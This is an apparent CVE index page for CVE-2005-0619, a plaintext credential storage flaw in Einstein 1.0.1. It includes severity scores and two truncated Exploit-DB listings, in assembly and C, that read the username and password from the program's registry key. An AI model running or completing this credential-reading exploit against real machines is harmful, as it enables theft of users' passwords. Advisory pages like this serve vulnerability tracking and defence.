CVE-2005-0619
published 2005-02-28CVE-2005-0619: Einstein 1.0.1 stores sensitive information such as usernames and passwords in plaintext in the registry, which allows local users to gain privileges.
PriorityP413low2.1CVSS 2.0
AVLACLAuNCPINAN
EXPLOIT
EPSS
1.07%
60.6th percentile
Einstein 1.0.1 stores sensitive information such as usernames and passwords in plaintext in the registry, which allows local users to gain privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bfriendly.com | einstein | <= 1.0.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Einstein 1.01 - Local Password Disclosure (ASM)
exploitdb·2005-02-28
CVE-2005-0619 Einstein 1.01 - Local Password Disclosure (ASM)
Einstein 1.01 - Local Password Disclosure (ASM)
---
; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib
Exploit-DB
Einstein 1.01 - Local Password Disclosure
exploitdb·2005-02-27
CVE-2005-0619 Einstein 1.01 - Local Password Disclosure
Einstein 1.01 - Local Password Disclosure
---
/*******************************************************************
Einstein v1.01 Local Password Disclosure Exploit by Kozan
Application: Einstein v1.01 (and previous versions)
Procuder: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]
*******************************************************************/
#include
#include
HKEY hKey;
#define BUFSIZE 100
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main(void)
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\einstein",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryVal
No writeups or analysis indexed.
2005-02-28
Published